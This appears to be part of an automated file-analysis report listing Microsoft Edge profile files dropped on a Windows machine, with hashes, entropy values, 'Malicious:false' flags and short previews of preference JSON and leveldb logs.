                                                                                                                                                                                                                                                                                    SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):9713
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.111389311051109
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:stxkdpe+suwsZihUktAm8dbV+FAAQA66WkaFIMY1PZYJ:stxQlsuwfhEbGvQx6WkaTYw
                                                                                                                                                                                                                                                                                    MD5:3A53E70AEE624CE0A5C22B64DBF18739
                                                                                                                                                                                                                                                                                    SHA1:B3CDAF8CB376A4B8A67A1327AEBA3449E77CB8AB
                                                                                                                                                                                                                                                                                    SHA-256:A0E51D00F3DDB126443BB7A0A77CCD4D2290EF40AE48DE60AAE78BA7B67C5B72
                                                                                                                                                                                                                                                                                    SHA-512:9C9FF148A630EFE600B2657A40237B009DE5EC278836BBC187D17E56B55BFCC339B78A7FE6CB03B5AED164D54ECCBEC8F74A14452F6E5477631CAFA811CD9C5F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379407068433583","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):25012
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.568364574025481
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:bHYVq4WPm4fs78F1+UoAYDCx9Tuqh0VfUC9xbog/OVY5qQ7rwO66pctuI:bHYVq4WPm4fs7u1jaJAQQOotD
                                                                                                                                                                                                                                                                                    MD5:33DE49756168DACA4034B274C1401326
                                                                                                                                                                                                                                                                                    SHA1:6EB2200F212C83FD2E1E50F38944606BEA5438AF
                                                                                                                                                                                                                                                                                    SHA-256:0FD31E055BCBE9DB953C2561A3235B34E4E41FAC6D5A68248A4569408DF1ED35
                                                                                                                                                                                                                                                                                    SHA-512:84546116AD508CD382713263AFB6E6AC98F916462042FB35C87748FA99360D1DDCF439635621424B2D9B98F332AF324B6947065D41FF26A14F1944E4AADA73DF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379407067597279","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379407067597279","location":5,"ma
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2394
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.804153295334101
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:F2em6DMrd6DfB+Prdod+6rd6GB+QrditB+C:F1mmMx6Dcxoo6x6oxQ
                                                                                                                                                                                                                                                                                    MD5:B20147E0B3BBF93EFA31FFF371538AE0
                                                                                                                                                                                                                                                                                    SHA1:943F47C99B0E682ED76489F24EAEA5C5EEEAB1DB
                                                                                                                                                                                                                                                                                    SHA-256:DE5D2FB464F4FD931A8266E23E7F4C0E94FED0BB4C5D44E811FEBC68244F672D
                                                                                                                                                                                                                                                                                    SHA-512:48CE74DD5719695B40C371CB7D158E8B9C4B19BA6D72C8FCDD3E2F40E689747C503B61B69CFE84B41BF627589087D2A4CA03207E5569DE07E0825017FDB82BF7
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2.:...................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true .(.0.8........@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x.................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmpt
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):299
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.144861904789896
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:P03Eq1923oH+TcwtE/a252KLlpjVq2P923oH+TcwtE/a2ZIFUv:PAEfYeb8xL3jVv4Yeb8J2FUv
                                                                                                                                                                                                                                                                                    MD5:A4ED61E93EA3DA826F72758B4E777357
                                                                                                                                                                                                                                                                                    SHA1:F4D07E61A4C9BFAAE287DD32484B75E6E87AA228
                                                                                                                                                                                                                                                                                    SHA-256:628EBC2EF102B24E059E625EDA7F2084E45E14143208D0DABB7F7F316C01FC99
                                                                                                                                                                                                                                                                                    SHA-512:5D7F327E555CD00FB612C1A721770BDA077BD2A43DE02497F2396D9A54CA11E8F39BA358409F10126DE3D9FF1567F6465C366F10C2431AC02E4CB274B7D2E40E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:58:03.438 1ff0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/12/23-00:58:03.449 1ff0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                    MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                    SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                    SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                    SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):114579
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.579858072451473
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:kU906yxPXfOxr1lhCe1nL/ImL/rBZXECjPXNtsf387ek3xm5:J9LyxPXfOxr1lMe1nL/5L/TXE6n7dQ
                                                                                                                                                                                                                                                                                    MD5:0144C23EADF9B87F6D72F73CCF888F29
                                                                                                                                                                                                                                                                                    SHA1:26F983D884E086499FA81EB5B0BEE8D6922ADEFA
                                                                                                                                                                                                                                                                                    SHA-256:B14B80EF28F55C5313E99CAD85DC2A0304BD41D7618D00D3B28EC2E5EE980B31
                                                                                                                                                                                                                                                                                    SHA-512:266D2633B1E81CFEA3CD87D689F7AB059E215B5C7E7B75361023D99D9851A98E3E3BB96C54C97FB11FCC45C9DD85BA3514D0F6293ACFFF27E4220DF43B947734
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):189105
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.387232269785005
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:E7ienpI6syRVwYaeRrz4cL//rTvY9vJ9i3LPKHcU5jL6:tUVwYTrPL/jzO9ko6
                                                                                                                                                                                                                                                                                    MD5:A93DD6FD7473CF2E93897470D6CEC368
                                                                                                                                                                                                                                                                                    SHA1:AA3A4D796102C2921ACD45899E9D2BD11452C2BE
                                                                                                                                                                                                                                                                                    SHA-256:09F8DCF7B338C9C0CDC2719081EB45DD26AC2A14977E1B2A1046714C76D088CC
                                                                                                                                                                                                                                                                                    SHA-512:43D7512A75AD3EB891B2F3EEA42173E1F83A25D3457B9C1A3A31C09BD8C0FFB804D6C12A876056567E8F0BB7646034349F615E42CB4ECBE784075DF9D637F540
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):24
Entropy (8bit):2.1431558784658327
Encrypted:false
SSDEEP:3:m+l:m
MD5:54CB446F628B2EA4A5BCE5769910512E
SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
Malicious:false
Preview:0\r..m..................
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):72
Entropy (8bit):3.5931902015385067
Encrypted:false
SSDEEP:3:Cwoc9Xl/lYV/lxEstllQGOao:CwoCYWs+GOH
MD5:3E9672D8557707FD05E3E913119B872A
SHA1:0A76C41FE99E92656C196EC80249B9A0569FC763
SHA-256:A77E11997A5031EEE54DAF9DEFBBED38A7CBDDDD6FC74A8838640C562C0E1FBF
SHA-512:A97006BBB9A80377C941619515A67832BFE5E301899808A2389643C16C943E7E1C8E8220FC6B55C52BC89A2745E0DAB2C383D0C2C826F6A09AF69E553C2DC827
Malicious:false
Preview:@...w8..oy retne.........................X....,....................../.
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):6145
Entropy (8bit):3.4029316397025458
Encrypted:false
SSDEEP:192:S5U4JPPn0IPma19Xp+/KiPLl9iSr/WhUungyg:iU4JPPn519Xp+iCLl9iSr+u0gyg
MD5:7972E552F4B2614AAABFD89AB0D4F7AC
SHA1:5290EBF49AAB3E55CF9207C0B9A1503BEEED8F31
SHA-256:8F468EAEE30A6E72BF487E02E7D94225FC8CE01FCEFFABBB999C509A6C5F822E
SHA-512:0880AB53234D8DE3935AC30C82269BDB04EF2F253293B139AFA79236748A092E9B61873BD598C46D8C54CF1E64529A459290419CF256B38861A56248D3AC54DD
Malicious:false
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):324
Entropy (8bit):5.126092636283
Encrypted:false
SSDEEP:6:ERdW2Iq2P923oH+TcwtrQMxIFUt8VRd6UEYZmw+VRdakwO923oH+TcwtrQMFLJ:D2Iv4YebCFUt8QUH/+k5LYebtJ
MD5:C2CF1A0E1E4069141582FAF82B1D3D55
SHA1:49E92E6AA1E3736B557AB5548A73F21D49BA201D
SHA-256:1A75B80202D19A13339175416B70EE710CDAEC3407B4346BC166659D6B2BCCC4
SHA-512:3A3BD4AF4C34C1B74422620370EFAE569816216E14C494D5451E4C132AC69D3DD9CE44B078E4105D2F3C3C643CD8DE53947BD894937306BCAE3259BD60D930B8
Malicious:false
Preview:2024/12/23-00:57:48.704 1a10 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/23-00:57:48.708 1a10 Recovering log #3.2024/12/23-00:57:48.765 1a10 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):1443
Entropy (8bit):3.837583571686768
Encrypted:false
SSDEEP:24:3fZRCmU929aqrlyebn9ipsAF4unx8tLp3X2amEtG1ChqVXWYaoQKkOAM4I:3R/4zFqLp2FEkCh+XaHOpZ
MD5:0774890A633245B078CCC41D3B7AA2A9
SHA1:7ED89413228471C36916578F1C6215C34C2F77AB
SHA-256:9B1CD1E4ED26B0AD34E6F79D9BA33FBB626074E8B2B8E3452FD71CABB3DE1434
SHA-512:47BD9B6F0AB05CB53B70992B34DB0FDBD9EFD2FF77DBE3F232AFEF41F6D6CAE11D1D0FEC37914AE84766A0378843C04FB9F1855F78E92A1A650B4FE566EB07CA
Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                    MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                    SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                    SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                    SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):352
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.171071058182489
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERCGZFIq2P923oH+Tcwt7Uh2ghZIFUt8VRXEvZZmw+VRs1kwO923oH+Tcwt7Uh2w:67Iv4YebIhHh2FUt8bEh/+A15LYebIh9
                                                                                                                                                                                                                                                                                    MD5:457BD4822AB39E8ED0C800D527E10C8D
                                                                                                                                                                                                                                                                                    SHA1:908435BD38AEAE5D57F3E5E69C6E8874EDE99D9C
                                                                                                                                                                                                                                                                                    SHA-256:9D02664DB32944A12F736C08942612A43C9C9A3C5E23AF79BA04282ECFAB355B
                                                                                                                                                                                                                                                                                    SHA-512:3289E4DF19AB462AC858F40D1ED64377DD6E8F0AB98713B86B2701616E2CFB3E75D39964FFCAF7FE78C7976B9C64819162E6241CE32F4545B1FF99F1708304B9
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:47.784 1c60 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/23-00:57:47.789 1c60 Recovering log #3.2024/12/23-00:57:47.790 1c60 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):352
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.171071058182489
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERCGZFIq2P923oH+Tcwt7Uh2ghZIFUt8VRXEvZZmw+VRs1kwO923oH+Tcwt7Uh2w:67Iv4YebIhHh2FUt8bEh/+A15LYebIh9
                                                                                                                                                                                                                                                                                    MD5:457BD4822AB39E8ED0C800D527E10C8D
                                                                                                                                                                                                                                                                                    SHA1:908435BD38AEAE5D57F3E5E69C6E8874EDE99D9C
                                                                                                                                                                                                                                                                                    SHA-256:9D02664DB32944A12F736C08942612A43C9C9A3C5E23AF79BA04282ECFAB355B
                                                                                                                                                                                                                                                                                    SHA-512:3289E4DF19AB462AC858F40D1ED64377DD6E8F0AB98713B86B2701616E2CFB3E75D39964FFCAF7FE78C7976B9C64819162E6241CE32F4545B1FF99F1708304B9
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:47.784 1c60 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/23-00:57:47.789 1c60 Recovering log #3.2024/12/23-00:57:47.790 1c60 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):270336
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                    MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                    SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                    SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                    SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):270336
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                    MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                    SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                    SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                    SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):434
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.276239017592217
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERd+uN+q2P923oH+TcwtzjqEKj3K/2jMGIFUt8VRdIuZZmw+VRdSVkwO923oH+Ts:Vnv4YebvqBQFUt8jZ/+I5LYebvqBvJ
                                                                                                                                                                                                                                                                                    MD5:21E00B8A455CAA5AFA4778BD1AE957D7
                                                                                                                                                                                                                                                                                    SHA1:341B8540A3A751F79A33B9E2969AD7C0EF21AF2F
                                                                                                                                                                                                                                                                                    SHA-256:FC7BC0C289E810CC9763C29543698437962602226B5B5A5259154F48C1F865D2
                                                                                                                                                                                                                                                                                    SHA-512:3C3A2A8A288005AD6F6C9A3D51535D826E9B165B2B7BA0514636C4519313827947C41343B7615EA4D81B0CBE1E327FE8A1A438B21B2795825681C2AE71350D87
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:48.680 19b8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/23-00:57:48.707 19b8 Recovering log #3.2024/12/23-00:57:48.739 19b8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):434
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.276239017592217
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:48.680 19b8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/23-00:57:48.707 19b8 Recovering log #3.2024/12/23-00:57:48.739 19b8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):144
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.842082263530856
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
